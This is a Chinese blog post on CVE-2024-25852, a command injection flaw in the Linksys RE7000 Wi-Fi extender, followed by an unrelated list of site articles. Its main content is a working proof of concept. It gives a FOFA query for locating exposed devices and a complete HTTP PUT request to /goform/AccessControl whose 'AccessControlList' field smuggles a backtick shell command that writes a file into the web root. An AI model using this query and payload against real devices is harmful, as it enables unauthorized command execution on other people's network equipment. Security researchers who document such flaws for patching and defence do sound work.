Linksys RE7000 “AccessControlList ”命令执行漏洞(CVE-2024-25852 )

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

Linksys RE7000 是由 Linksys 公司生产的一款 Wi-Fi 信号扩展器。Linksys 是一家知名的网络设备制造商。RE7000 的设计目的是增强和扩展现有 Wi-Fi 网络的覆盖范围,帮助消除无信号区域,并改善信号薄弱的区域的连接质量。

Linksys RE7000 v2.0.9、2.0.11和v 2.0.15在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。

资产搜索

fofa

body="/login.shtml?ran="

漏洞复现

PUT /goform/AccessControl HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 92
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1

{"AccessPolicy":"0","AccessControlList":"`echo ceshi>/etc_ro/lighttpd/RE7000_www/test.txt`"}

http://127.0.0.1/test.txt

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-25 09:18:05       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-25 09:18:05       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-25 09:18:05       82 阅读
  4. Python语言-面向对象

    2024-04-25 09:18:05       91 阅读

热门阅读

  1. watchEffect的使用

    2024-04-25 09:18:05       36 阅读
  2. IDEA->EasyCode(mapper.xml) 字段无逗号分割问题

    2024-04-25 09:18:05       30 阅读
  3. 执法记录仪如何防抖

    2024-04-25 09:18:05       34 阅读
  4. TiDB-PCTP考试复习

    2024-04-25 09:18:05       31 阅读
  5. STM32_警报装置

    2024-04-25 09:18:05       36 阅读
  6. 开发语言漫谈-ABAP

    2024-04-25 09:18:05       34 阅读
  7. 常用的机器学习模型算法

    2024-04-25 09:18:05       30 阅读
  8. C#算法之冒泡排序算法

    2024-04-25 09:18:05       33 阅读
  9. HarmonyOS —— 仿 XPermission 鸿蒙权限申请工具类

    2024-04-25 09:18:05       32 阅读
  10. 一个缓存泛型自动处理队列,留有处理事件接口

    2024-04-25 09:18:05       35 阅读
  11. 网络安全之WebShell截获

    2024-04-25 09:18:05       31 阅读